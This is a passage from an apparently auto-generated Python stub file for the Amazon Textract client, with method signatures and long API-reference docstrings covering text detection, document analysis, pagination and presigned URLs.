The column in which a table cell appears. The first column position is 1. ``ColumnIndex`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **RowSpan** *(integer) --*
The number of rows that a table spans. ``RowSpan`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **ColumnSpan** *(integer) --*
The number of columns that a table cell spans. ``ColumnSpan`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **Geometry** *(dict) --*
The location of the recognized text on the image. It includes an axis-aligned, coarse bounding box that surrounds the text, and a finer-grain polygon for more accurate spatial information.
- **BoundingBox** *(dict) --*
An axis-aligned coarse representation of the location of the recognized text on the document page.
- **Width** *(float) --*
The width of the bounding box as a ratio of the overall document page width.
- **Height** *(float) --*
The height of the bounding box as a ratio of the overall document page height.
- **Left** *(float) --*
The left coordinate of the bounding box as a ratio of overall document page width.
- **Top** *(float) --*
The top coordinate of the bounding box as a ratio of overall document page height.
- **Polygon** *(list) --*
Within the bounding box, a fine-grained polygon around the recognized text.
- *(dict) --*
The X and Y coordinates of a point on a document page. The X and Y values returned are ratios of the overall document page size. For example, if the input document is 700 x 200 and the operation returns X=0.5 and Y=0.25, then the point is at the (350,50) pixel coordinate on the document page.
An array of ``Point`` objects, ``Polygon`` , is returned by DetectDocumentText . ``Polygon`` represents a fine-grained polygon around detected text. For more information, see Geometry in the Amazon Textract Developer Guide.
- **X** *(float) --*
The value of the X coordinate for a point on a ``Polygon`` .
- **Y** *(float) --*
The value of the Y coordinate for a point on a ``Polygon`` .
- **Id** *(string) --*
The identifier for the recognized text. The identifier is only unique for a single operation.
- **Relationships** *(list) --*
A list of child blocks of the current block. For example a LINE object has child blocks for each WORD block that's part of the line of text. There aren't Relationship objects in the list for relationships that don't exist, such as when the current block has no child blocks. The list size can be the following:
* 0 - The block has no child blocks.
* 1 - The block has child blocks.
- *(dict) --*
Information about how blocks are related to each other. A ``Block`` object contains 0 or more ``Relation`` objects in a list, ``Relationships`` . For more information, see Block .
The ``Type`` element provides the type of the relationship for all blocks in the ``IDs`` array.
- **Type** *(string) --*
The type of relationship that the blocks in the IDs array have with the current block. The relationship can be ``VALUE`` or ``CHILD`` .
- **Ids** *(list) --*
An array of IDs for related blocks. You can get the type of the relationship from the ``Type`` element.
- *(string) --*
- **EntityTypes** *(list) --*
The type of entity. The following can be returned:
* *KEY* - An identifier for a field on the document.
* *VALUE* - The field text.
``EntityTypes`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- *(string) --*
- **SelectionStatus** *(string) --*
The selection status of a selectable element such as a radio button or checkbox.
- **Page** *(integer) --*
The page in which a block was detected. ``Page`` is returned by asynchronous operations. Page values greater than 1 are only returned for multi-page documents that are in PDF format. A scanned image (JPG/PNG), even if it contains multiple document pages, is always considered to be a single-page document and the value of ``Page`` is always 1. Synchronous operations don't return ``Page`` as every input document is considered to be a single-page document.
:type Document: dict
:param Document: **[REQUIRED]**
The input document as base64-encoded bytes or an Amazon S3 object. If you use the AWS CLI to call Amazon Textract operations, you can\'t pass image bytes. The document must be an image in JPG or PNG format.
If you are using an AWS SDK to call Amazon Textract, you might not need to base64-encode image bytes passed using the ``Bytes`` field.
- **Bytes** *(bytes) --*
A blob of base-64 encoded documents bytes. The maximum size of a document that\'s provided in a blob of bytes is 5 MB. The document bytes must be in PNG or JPG format.
If you are using an AWS SDK to call Amazon Textract, you might not need to base64-encode image bytes passed using the ``Bytes`` field.
- **S3Object** *(dict) --*
Identifies an S3 object as the document source. The maximum size of a document stored in an S3 bucket is 5 MB.
- **Bucket** *(string) --*
The name of the S3 bucket.
- **Name** *(string) --*
The file name of the input document. It must be an image file (.JPG or .PNG format). Asynchronous operations also support PDF files.
- **Version** *(string) --*
If the bucket has versioning enabled, you can specify the object version.
:type FeatureTypes: list
:param FeatureTypes: **[REQUIRED]**
A list of the types of analysis to perform. Add TABLES to the list to return information about the tables detected in the input document. Add FORMS to return detected fields and the associated text. To perform both types of analysis, add TABLES and FORMS to ``FeatureTypes`` .
- *(string) --*
:rtype: dict
:returns:
"""
pass
def can_paginate(self, operation_name: str = None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:return: ``True`` if the operation can be paginated,
``False`` otherwise.
"""
pass
def detect_document_text(self, Document: Dict) -> Dict:
"""
Detects text in the input document. Amazon Textract can detect lines of text and the words that make up a line of text. The input document must be an image in JPG or PNG format. ``DetectDocumentText`` returns the detected text in an array of Block objects.
Each document page has as an associated ``Block`` of type PAGE. Each PAGE ``Block`` object is the parent of LINE ``Block`` objects that represent the lines of detected text on a page. A LINE ``Block`` object is a parent for each word that makes up the line. Words are represented by ``Block`` objects of type WORD.
``DetectDocumentText`` is a synchronous operation. To analyze documents asynchronously, use StartDocumentTextDetection .
For more information, see `Document Text Detection <https://docs.aws.amazon.com/textract/latest/dg/how-it-works-detecting.html>`__ .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/textract-2018-06-27/DetectDocumentText>`_
**Request Syntax**
::
response = client.detect_document_text(
Document={
'Bytes': b'bytes',
'S3Object': {
'Bucket': 'string',
'Name': 'string',
'Version': 'string'
}
}
)
**Response Syntax**
::
{
'DocumentMetadata': {
'Pages': 123
},
'Blocks': [
{
'BlockType': 'KEY_VALUE_SET'|'PAGE'|'LINE'|'WORD'|'TABLE'|'CELL'|'SELECTION_ELEMENT',
'Confidence': ...,
'Text': 'string',
'RowIndex': 123,
'ColumnIndex': 123,
'RowSpan': 123,
'ColumnSpan': 123,
'Geometry': {
'BoundingBox': {
'Width': ...,
'Height': ...,
'Left': ...,
'Top': ...
},
'Polygon': [
{
'X': ...,
'Y': ...
},
]
},
'Id': 'string',
'Relationships': [
{
'Type': 'VALUE'|'CHILD',
'Ids': [
'string',
]
},
],
'EntityTypes': [
'KEY'|'VALUE',
],
'SelectionStatus': 'SELECTED'|'NOT_SELECTED',
'Page': 123
},
]
}
**Response Structure**
- *(dict) --*
- **DocumentMetadata** *(dict) --*
Metadata about the document. Contains the number of pages that are detected in the document.
- **Pages** *(integer) --*
The number of pages detected in the document.
- **Blocks** *(list) --*
An array of Block objects containing the text detected in the document.
- *(dict) --*
A ``Block`` represents items that are recognized in a document within a group of pixels close to each other. The information returned in a ``Block`` depends on the type of operation. In document-text detection (for example DetectDocumentText ), you get information about the detected words and lines of text. In text analysis (for example AnalyzeDocument ), you can also get information about the fields, tables and selection elements that are detected in the document.
An array of ``Block`` objects is returned by both synchronous and asynchronous operations. In synchronous operations, such as DetectDocumentText , the array of ``Block`` objects is the entire set of results. In asynchronous operations, such as GetDocumentAnalysis , the array is returned over one or more responses.
For more information, see `How Amazon Textract Works <https://docs.aws.amazon.com/textract/latest/dg/how-it-works.html>`__ .
- **BlockType** *(string) --*
The type of text that's recognized in a block. In text-detection operations, the following types are returned:
* *PAGE* - Contains a list of the LINE Block objects that are detected on a document page.
* *WORD* - A word detected on a document page. A word is one or more ISO basic Latin script characters that aren't separated by spaces.
* *LINE* - A string of tab-delimited, contiguous words that's detected on a document page.
In text analysis operations, the following types are returned:
* *PAGE* - Contains a list of child Block objects that are detected on a document page.
* *KEY_VALUE_SET* - Stores the KEY and VALUE Block objects for a field that's detected on a document page. Use the ``EntityType`` field to determine if a KEY_VALUE_SET object is a KEY Block object or a VALUE Block object.
* *WORD* - A word detected on a document page. A word is one or more ISO basic Latin script characters that aren't separated by spaces that's detected on a document page.
* *LINE* - A string of tab-delimited, contiguous words that's detected on a document page.
* *TABLE* - A table that's detected on a document page. A table is any grid-based information with 2 or more rows or columns with a cell span of 1 row and 1 column each.
* *CELL* - A cell within a detected table. The cell is the parent of the block that contains the text in the cell.
* *SELECTION_ELEMENT* - A selectable element such as a radio button or checkbox that's detected on a document page. Use the value of ``SelectionStatus`` to determine the status of the selection element.
- **Confidence** *(float) --*
The confidence that Amazon Textract has in the accuracy of the recognized text and the accuracy of the geometry points around the recognized text.
- **Text** *(string) --*
The word or line of text that's recognized by Amazon Textract.
- **RowIndex** *(integer) --*
The row in which a table cell is located. The first row position is 1. ``RowIndex`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **ColumnIndex** *(integer) --*
The column in which a table cell appears. The first column position is 1. ``ColumnIndex`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **RowSpan** *(integer) --*
The number of rows that a table spans. ``RowSpan`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **ColumnSpan** *(integer) --*
The number of columns that a table cell spans. ``ColumnSpan`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **Geometry** *(dict) --*
The location of the recognized text on the image. It includes an axis-aligned, coarse bounding box that surrounds the text, and a finer-grain polygon for more accurate spatial information.
- **BoundingBox** *(dict) --*
An axis-aligned coarse representation of the location of the recognized text on the document page.
- **Width** *(float) --*
The width of the bounding box as a ratio of the overall document page width.
- **Height** *(float) --*
The height of the bounding box as a ratio of the overall document page height.
- **Left** *(float) --*
The left coordinate of the bounding box as a ratio of overall document page width.
- **Top** *(float) --*
The top coordinate of the bounding box as a ratio of overall document page height.
- **Polygon** *(list) --*
Within the bounding box, a fine-grained polygon around the recognized text.
- *(dict) --*
The X and Y coordinates of a point on a document page. The X and Y values returned are ratios of the overall document page size. For example, if the input document is 700 x 200 and the operation returns X=0.5 and Y=0.25, then the point is at the (350,50) pixel coordinate on the document page.
An array of ``Point`` objects, ``Polygon`` , is returned by DetectDocumentText . ``Polygon`` represents a fine-grained polygon around detected text. For more information, see Geometry in the Amazon Textract Developer Guide.
- **X** *(float) --*
The value of the X coordinate for a point on a ``Polygon`` .
- **Y** *(float) --*
The value of the Y coordinate for a point on a ``Polygon`` .
- **Id** *(string) --*
The identifier for the recognized text. The identifier is only unique for a single operation.
- **Relationships** *(list) --*
A list of child blocks of the current block. For example a LINE object has child blocks for each WORD block that's part of the line of text. There aren't Relationship objects in the list for relationships that don't exist, such as when the current block has no child blocks. The list size can be the following:
* 0 - The block has no child blocks.
* 1 - The block has child blocks.
- *(dict) --*
Information about how blocks are related to each other. A ``Block`` object contains 0 or more ``Relation`` objects in a list, ``Relationships`` . For more information, see Block .
The ``Type`` element provides the type of the relationship for all blocks in the ``IDs`` array.
- **Type** *(string) --*
The type of relationship that the blocks in the IDs array have with the current block. The relationship can be ``VALUE`` or ``CHILD`` .
- **Ids** *(list) --*
An array of IDs for related blocks. You can get the type of the relationship from the ``Type`` element.
- *(string) --*
- **EntityTypes** *(list) --*
The type of entity. The following can be returned:
* *KEY* - An identifier for a field on the document.
* *VALUE* - The field text.
``EntityTypes`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- *(string) --*
- **SelectionStatus** *(string) --*
The selection status of a selectable element such as a radio button or checkbox.
- **Page** *(integer) --*
The page in which a block was detected. ``Page`` is returned by asynchronous operations. Page values greater than 1 are only returned for multi-page documents that are in PDF format. A scanned image (JPG/PNG), even if it contains multiple document pages, is always considered to be a single-page document and the value of ``Page`` is always 1. Synchronous operations don't return ``Page`` as every input document is considered to be a single-page document.
:type Document: dict
:param Document: **[REQUIRED]**
The input document as base64-encoded bytes or an Amazon S3 object. If you use the AWS CLI to call Amazon Textract operations, you can\'t pass image bytes. The document must be an image in JPG or PNG format.
If you are using an AWS SDK to call Amazon Textract, you might not need to base64-encode image bytes passed using the ``Bytes`` field.
- **Bytes** *(bytes) --*
A blob of base-64 encoded documents bytes. The maximum size of a document that\'s provided in a blob of bytes is 5 MB. The document bytes must be in PNG or JPG format.
If you are using an AWS SDK to call Amazon Textract, you might not need to base64-encode image bytes passed using the ``Bytes`` field.
- **S3Object** *(dict) --*
Identifies an S3 object as the document source. The maximum size of a document stored in an S3 bucket is 5 MB.
- **Bucket** *(string) --*
The name of the S3 bucket.
- **Name** *(string) --*
The file name of the input document. It must be an image file (.JPG or .PNG format). Asynchronous operations also support PDF files.
- **Version** *(string) --*
If the bucket has versioning enabled, you can specify the object version.
:rtype: dict
:returns:
"""
pass
def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
``ClientMethod``.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method\'s model.
:returns: The presigned url
"""
pass
def get_document_analysis(self, JobId: str, MaxResults: int = None, NextToken: str = None) -> Dict:
"""
Gets the results for an Amazon Textract asynchronous operation that analyzes text in a document.
You start asynchronous text analysis by calling StartDocumentAnalysis , which returns a job identifier (``JobId`` ). When the text analysis operation finishes, Amazon Textract publishes a completion status to the Amazon Simple Notification Service (Amazon SNS) topic that's registered in the initial call to ``StartDocumentAnalysis`` . To get the results of the text-detection operation, first check that the status value published to the Amazon SNS topic is ``SUCCEEDED`` . If so, call ``GetDocumentAnalysis`` , and pass the job identifier (``JobId`` ) from the initial call to ``StartDocumentAnalysis`` .
``GetDocumentAnalysis`` returns an array of Block objects. The following types of information are returned:
* Words and lines that are related to nearby lines and words. The related information is returned in two Block objects each of type ``KEY_VALUE_SET`` : a KEY Block object and a VALUE Block object. For example, *Name: Ana Silva Carolina* contains a key and value. *Name:* is the key. *Ana Silva Carolina* is the value.
* Table and table cell data. A TABLE Block object contains information about a detected table. A CELL Block object is returned for each cell in a table.
* Selectable elements such as checkboxes and radio buttons. A SELECTION_ELEMENT Block object contains information about a selectable element.
* Lines and words of text. A LINE Block object contains one or more WORD Block objects.
Use the ``MaxResults`` parameter to limit the number of blocks returned. If there are more results than specified in ``MaxResults`` , the value of ``NextToken`` in the operation response contains a pagination token for getting the next set of results. To get the next page of results, call ``GetDocumentAnalysis`` , and populate the ``NextToken`` request parameter with the token value that's returned from the previous call to ``GetDocumentAnalysis`` .
For more information, see `Document Text Analysis <https://docs.aws.amazon.com/textract/latest/dg/how-it-works-analyzing.html>`__ .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/textract-2018-06-27/GetDocumentAnalysis>`_
**Request Syntax**
::
response = client.get_document_analysis(
JobId='string',
MaxResults=123,
NextToken='string'
)
**Response Syntax**
::
{
'DocumentMetadata': {
'Pages': 123
},
'JobStatus': 'IN_PROGRESS'|'SUCCEEDED'|'FAILED'|'PARTIAL_SUCCESS',
'NextToken': 'string',
'Blocks': [
{
'BlockType': 'KEY_VALUE_SET'|'PAGE'|'LINE'|'WORD'|'TABLE'|'CELL'|'SELECTION_ELEMENT',
'Confidence': ...,
'Text': 'string',
'RowIndex': 123,
'ColumnIndex': 123,
'RowSpan': 123,
'ColumnSpan': 123,
'Geometry': {
'BoundingBox': {
'Width': ...,
'Height': ...,
'Left': ...,
'Top': ...
},
'Polygon': [
{
'X': ...,
'Y': ...
},
]
},
'Id': 'string',
'Relationships': [
{
'Type': 'VALUE'|'CHILD',
'Ids': [
'string',
]
},
],
'EntityTypes': [
'KEY'|'VALUE',
],
'SelectionStatus': 'SELECTED'|'NOT_SELECTED',
'Page': 123
},
],
'Warnings': [
{
'ErrorCode': 'string',
'Pages': [
123,
]
},
],
'StatusMessage': 'string'
}
**Response Structure**
- *(dict) --*
- **DocumentMetadata** *(dict) --*
Information about a document that Amazon Textract processed. ``DocumentMetadata`` is returned in every page of paginated responses from an Amazon Textract video operation.
- **Pages** *(integer) --*
The number of pages detected in the document.
- **JobStatus** *(string) --*
The current status of the text detection job.
- **NextToken** *(string) --*
If the response is truncated, Amazon Textract returns this token. You can use this token in the subsequent request to retrieve the next set of text detection results.
- **Blocks** *(list) --*
The results of the text analysis operation.
- *(dict) --*
A ``Block`` represents items that are recognized in a document within a group of pixels close to each other. The information returned in a ``Block`` depends on the type of operation. In document-text detection (for example DetectDocumentText ), you get information about the detected words and lines of text. In text analysis (for example AnalyzeDocument ), you can also get information about the fields, tables and selection elements that are detected in the document.
An array of ``Block`` objects is returned by both synchronous and asynchronous operations. In synchronous operations, such as DetectDocumentText , the array of ``Block`` objects is the entire set of results. In asynchronous operations, such as GetDocumentAnalysis , the array is returned over one or more responses.
For more information, see `How Amazon Textract Works <https://docs.aws.amazon.com/textract/latest/dg/how-it-works.html>`__ .
- **BlockType** *(string) --*
The type of text that's recognized in a block. In text-detection operations, the following types are returned:
* *PAGE* - Contains a list of the LINE Block objects that are detected on a document page.
* *WORD* - A word detected on a document page. A word is one or more ISO basic Latin script characters that aren't separated by spaces.
* *LINE* - A string of tab-delimited, contiguous words that's detected on a document page.
In text analysis operations, the following types are returned:
* *PAGE* - Contains a list of child Block objects that are detected on a document page.
* *KEY_VALUE_SET* - Stores the KEY and VALUE Block objects for a field that's detected on a document page. Use the ``EntityType`` field to determine if a KEY_VALUE_SET object is a KEY Block object or a VALUE Block object.
* *WORD* - A word detected on a document page. A word is one or more ISO basic Latin script characters that aren't separated by spaces that's detected on a document page.
* *LINE* - A string of tab-delimited, contiguous words that's detected on a document page.
* *TABLE* - A table that's detected on a document page. A table is any grid-based information with 2 or more rows or columns with a cell span of 1 row and 1 column each.
* *CELL* - A cell within a detected table. The cell is the parent of the block that contains the text in the cell.
* *SELECTION_ELEMENT* - A selectable element such as a radio button or checkbox that's detected on a document page. Use the value of ``SelectionStatus`` to determine the status of the selection element.
- **Confidence** *(float) --*
The confidence that Amazon Textract has in the accuracy of the recognized text and the accuracy of the geometry points around the recognized text.
- **Text** *(string) --*
The word or line of text that's recognized by Amazon Textract.
- **RowIndex** *(integer) --*
The row in which a table cell is located. The first row position is 1. ``RowIndex`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **ColumnIndex** *(integer) --*
The column in which a table cell appears. The first column position is 1. ``ColumnIndex`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **RowSpan** *(integer) --*
The number of rows that a table spans. ``RowSpan`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **ColumnSpan** *(integer) --*
The number of columns that a table cell spans. ``ColumnSpan`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **Geometry** *(dict) --*
The location of the recognized text on the image. It includes an axis-aligned, coarse bounding box that surrounds the text, and a finer-grain polygon for more accurate spatial information.
- **BoundingBox** *(dict) --*
An axis-aligned coarse representation of the location of the recognized text on the document page.
- **Width** *(float) --*
The width of the bounding box as a ratio of the overall document page width.
- **Height** *(float) --*
The height of the bounding box as a ratio of the overall document page height.
- **Left** *(float) --*
The left coordinate of the bounding box as a ratio of overall document page width.
- **Top** *(float) --*
The top coordinate of the bounding box as a ratio of overall document page height.
- **Polygon** *(list) --*
Within the bounding box, a fine-grained polygon around the recognized text.
- *(dict) --*
The X and Y coordinates of a point on a document page. The X and Y values returned are ratios of the overall document page size. For example, if the input document is 700 x 200 and the operation returns X=0.5 and Y=0.25, then the point is at the (350,50) pixel coordinate on the document page.
An array of ``Point`` objects, ``Polygon`` , is returned by DetectDocumentText . ``Polygon`` represents a fine-grained polygon around detected text. For more information, see Geometry in the Amazon Textract Developer Guide.
- **X** *(float) --*
The value of the X coordinate for a point on a ``Polygon`` .
- **Y** *(float) --*
The value of the Y coordinate for a point on a ``Polygon`` .
- **Id** *(string) --*
The identifier for the recognized text. The identifier is only unique for a single operation.
- **Relationships** *(list) --*
A list of child blocks of the current block. For example a LINE object has child blocks for each WORD block that's part of the line of text. There aren't Relationship objects in the list for relationships that don't exist, such as when the current block has no child blocks. The list size can be the following:
* 0 - The block has no child blocks.
* 1 - The block has child blocks.
- *(dict) --*
Information about how blocks are related to each other. A ``Block`` object contains 0 or more ``Relation`` objects in a list, ``Relationships`` . For more information, see Block .
The ``Type`` element provides the type of the relationship for all blocks in the ``IDs`` array.
- **Type** *(string) --*
The type of relationship that the blocks in the IDs array have with the current block. The relationship can be ``VALUE`` or ``CHILD`` .
- **Ids** *(list) --*
An array of IDs for related blocks. You can get the type of the relationship from the ``Type`` element.
- *(string) --*
- **EntityTypes** *(list) --*
The type of entity. The following can be returned:
* *KEY* - An identifier for a field on the document.
* *VALUE* - The field text.
``EntityTypes`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- *(string) --*
- **SelectionStatus** *(string) --*
The selection status of a selectable element such as a radio button or checkbox.
- **Page** *(integer) --*
The page in which a block was detected. ``Page`` is returned by asynchronous operations. Page values greater than 1 are only returned for multi-page documents that are in PDF format. A scanned image (JPG/PNG), even if it contains multiple document pages, is always considered to be a single-page document and the value of ``Page`` is always 1. Synchronous operations don't return ``Page`` as every input document is considered to be a single-page document.
- **Warnings** *(list) --*
A list of warnings that occurred during the document analysis operation.
- *(dict) --*
A warning about an issue that occurred during asynchronous text analysis ( StartDocumentAnalysis ) or asynchronous document-text detection ( StartDocumentTextDetection ).
- **ErrorCode** *(string) --*
The error code for the warning.
- **Pages** *(list) --*
A list of the pages that the warning applies to.
- *(integer) --*
- **StatusMessage** *(string) --*
The current status of an asynchronous document analysis operation.
:type JobId: string
:param JobId: **[REQUIRED]**
A unique identifier for the text-detection job. The ``JobId`` is returned from ``StartDocumentAnalysis`` .
:type MaxResults: integer
:param MaxResults:
The maximum number of results to return per paginated call. The largest value that you can specify is 1,000. If you specify a value greater than 1,000, a maximum of 1,000 results is returned. The default value is 1,000.
:type NextToken: string
:param NextToken:
If the previous response was incomplete (because there are more blocks to retrieve), Amazon Textract returns a pagination token in the response. You can use this pagination token to retrieve the next set of blocks.
:rtype: dict
:returns:
"""
pass
def get_document_text_detection(self, JobId: str, MaxResults: int = None, NextToken: str = None) -> Dict:
"""
Gets the results for an Amazon Textract asynchronous operation that detects text in a document. Amazon Textract can detect lines of text and the words that make up a line of text.
You start asynchronous text detection by calling StartDocumentTextDetection , which returns a job identifier (``JobId`` ). When the text detection operation finishes, Amazon Textract publishes a completion status to the Amazon Simple Notification Service (Amazon SNS) topic that's registered in the initial call to ``StartDocumentTextDetection`` . To get the results of the text-detection operation, first check that the status value published to the Amazon SNS topic is ``SUCCEEDED`` . If so, call ``GetDocumentTextDetection`` , and pass the job identifier (``JobId`` ) from the initial call to ``StartDocumentTextDetection`` .
``GetDocumentTextDetection`` returns an array of Block objects.
Each document page has as an associated ``Block`` of type PAGE. Each PAGE ``Block`` object is the parent of LINE ``Block`` objects that represent the lines of detected text on a page. A LINE ``Block`` object is a parent for each word that makes up the line. Words are represented by ``Block`` objects of type WORD.
Use the MaxResults parameter to limit the number of blocks that are returned. If there are more results than specified in ``MaxResults`` , the value of ``NextToken`` in the operation response contains a pagination token for getting the next set of results. To get the next page of results, call ``GetDocumentTextDetection`` , and populate the ``NextToken`` request parameter with the token value that's returned from the previous call to ``GetDocumentTextDetection`` .
For more information, see `Document Text Detection <https://docs.aws.amazon.com/textract/latest/dg/how-it-works-detecting.html>`__ .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/textract-2018-06-27/GetDocumentTextDetection>`_
**Request Syntax**
::
response = client.get_document_text_detection(
JobId='string',
MaxResults=123,
NextToken='string'
)
**Response Syntax**
::
{
'DocumentMetadata': {
'Pages': 123
},
'JobStatus': 'IN_PROGRESS'|'SUCCEEDED'|'FAILED'|'PARTIAL_SUCCESS',
'NextToken': 'string',
'Blocks': [
{
'BlockType': 'KEY_VALUE_SET'|'PAGE'|'LINE'|'WORD'|'TABLE'|'CELL'|'SELECTION_ELEMENT',
'Confidence': ...,
'Text': 'string',
'RowIndex': 123,
'ColumnIndex': 123,
'RowSpan': 123,
'ColumnSpan': 123,
'Geometry': {
'BoundingBox': {
'Width': ...,
'Height': ...,
'Left': ...,
'Top': ...
},
'Polygon': [
{
'X': ...,
'Y': ...
},
]
},
'Id': 'string',
'Relationships': [
{
'Type': 'VALUE'|'CHILD',
'Ids': [
'string',
]
},
],
'EntityTypes': [
'KEY'|'VALUE',
],
'SelectionStatus': 'SELECTED'|'NOT_SELECTED',
'Page': 123
},
],
'Warnings': [
{
'ErrorCode': 'string',
'Pages': [
123,
]
},
],
'StatusMessage': 'string'
}
**Response Structure**
- *(dict) --*
- **DocumentMetadata** *(dict) --*
Information about a document that Amazon Textract processed. ``DocumentMetadata`` is returned in every page of paginated responses from an Amazon Textract video operation.
- **Pages** *(integer) --*
The number of pages detected in the document.
- **JobStatus** *(string) --*
The current status of the text detection job.
- **NextToken** *(string) --*
If the response is truncated, Amazon Textract returns this token. You can use this token in the subsequent request to retrieve the next set of text-detection results.
- **Blocks** *(list) --*
The results of the text-detection operation.
- *(dict) --*
A ``Block`` represents items that are recognized in a document within a group of pixels close to each other. The information returned in a ``Block`` depends on the type of operation. In document-text detection (for example DetectDocumentText ), you get information about the detected words and lines of text. In text analysis (for example AnalyzeDocument ), you can also get information about the fields, tables and selection elements that are detected in the document.
An array of ``Block`` objects is returned by both synchronous and asynchronous operations. In synchronous operations, such as DetectDocumentText , the array of ``Block`` objects is the entire set of results. In asynchronous operations, such as GetDocumentAnalysis , the array is returned over one or more responses.
For more information, see `How Amazon Textract Works <https://docs.aws.amazon.com/textract/latest/dg/how-it-works.html>`__ .
- **BlockType** *(string) --*
The type of text that's recognized in a block. In text-detection operations, the following types are returned:
* *PAGE* - Contains a list of the LINE Block objects that are detected on a document page.
* *WORD* - A word detected on a document page. A word is one or more ISO basic Latin script characters that aren't separated by spaces.
* *LINE* - A string of tab-delimited, contiguous words that's detected on a document page.
In text analysis operations, the following types are returned:
* *PAGE* - Contains a list of child Block objects that are detected on a document page.
* *KEY_VALUE_SET* - Stores the KEY and VALUE Block objects for a field that's detected on a document page. Use the ``EntityType`` field to determine if a KEY_VALUE_SET object is a KEY Block object or a VALUE Block object.
* *WORD* - A word detected on a document page. A word is one or more ISO basic Latin script characters that aren't separated by spaces that's detected on a document page.
* *LINE* - A string of tab-delimited, contiguous words that's detected on a document page.
* *TABLE* - A table that's detected on a document page. A table is any grid-based information with 2 or more rows or columns with a cell span of 1 row and 1 column each.
* *CELL* - A cell within a detected table. The cell is the parent of the block that contains the text in the cell.
* *SELECTION_ELEMENT* - A selectable element such as a radio button or checkbox that's detected on a document page. Use the value of ``SelectionStatus`` to determine the status of the selection element.
- **Confidence** *(float) --*
The confidence that Amazon Textract has in the accuracy of the recognized text and the accuracy of the geometry points around the recognized text.
- **Text** *(string) --*
The word or line of text that's recognized by Amazon Textract.
- **RowIndex** *(integer) --*
The row in which a table cell is located. The first row position is 1. ``RowIndex`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **ColumnIndex** *(integer) --*
The column in which a table cell appears. The first column position is 1. ``ColumnIndex`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **RowSpan** *(integer) --*
The number of rows that a table spans. ``RowSpan`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **ColumnSpan** *(integer) --*
The number of columns that a table cell spans. ``ColumnSpan`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **Geometry** *(dict) --*
The location of the recognized text on the image. It includes an axis-aligned, coarse bounding box that surrounds the text, and a finer-grain polygon for more accurate spatial information.
- **BoundingBox** *(dict) --*
An axis-aligned coarse representation of the location of the recognized text on the document page.
- **Width** *(float) --*
The width of the bounding box as a ratio of the overall document page width.
- **Height** *(float) --*
The height of the bounding box as a ratio of the overall document page height.
- **Left** *(float) --*
The left coordinate of the bounding box as a ratio of overall document page width.
- **Top** *(float) --*
The top coordinate of the bounding box as a ratio of overall document page height.
- **Polygon** *(list) --*
Within the bounding box, a fine-grained polygon around the recognized text.
- *(dict) --*
The X and Y coordinates of a point on a document page. The X and Y values returned are ratios of the overall document page size. For example, if the input document is 700 x 200 and the operation returns X=0.5 and Y=0.25, then the point is at the (350,50) pixel coordinate on the document page.
An array of ``Point`` objects, ``Polygon`` , is returned by DetectDocumentText . ``Polygon`` represents a fine-grained polygon around detected text. For more information, see Geometry in the Amazon Textract Developer Guide.
- **X** *(float) --*
The value of the X coordinate for a point on a ``Polygon`` .
- **Y** *(float) --*
The value of the Y coordinate for a point on a ``Polygon`` .
- **Id** *(string) --*
The identifier for the recognized text. The identifier is only unique for a single operation.
- **Relationships** *(list) --*
A list of child blocks of the current block. For example a LINE object has child blocks for each WORD block that's part of the line of text. There aren't Relationship objects in the list for relationships that don't exist, such as when the current block has no child blocks. The list size can be the following:
* 0 - The block has no child blocks.
* 1 - The block has child blocks.
- *(dict) --*
Information about how blocks are related to each other. A ``Block`` object contains 0 or more ``Relation`` objects in a list, ``Relationships`` . For more information, see Block .
The ``Type`` element provides the type of the relationship for all blocks in the ``IDs`` array.
- **Type** *(string) --*
The type of relationship that the blocks in the IDs array have with the current block. The relationship can be ``VALUE`` or ``CHILD`` .
- **Ids** *(list) --*
An array of IDs for related blocks. You can get the type of the relationship from the ``Type`` element.
- *(string) --*
- **EntityTypes** *(list) --*
The type of entity. The following can be returned:
* *KEY* - An identifier for a field on the document.
* *VALUE* - The field text.
``EntityTypes`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- *(string) --*
- **SelectionStatus** *(string) --*
The selection status of a selectable element such as a radio button or checkbox.
- **Page** *(integer) --*
The page in which a block was detected. ``Page`` is returned by asynchronous operations. Page values greater than 1 are only returned for multi-page documents that are in PDF format. A scanned image (JPG/PNG), even if it contains multiple document pages, is always considered to be a single-page document and the value of ``Page`` is always 1. Synchronous operations don't return ``Page`` as every input document is considered to be a single-page document.
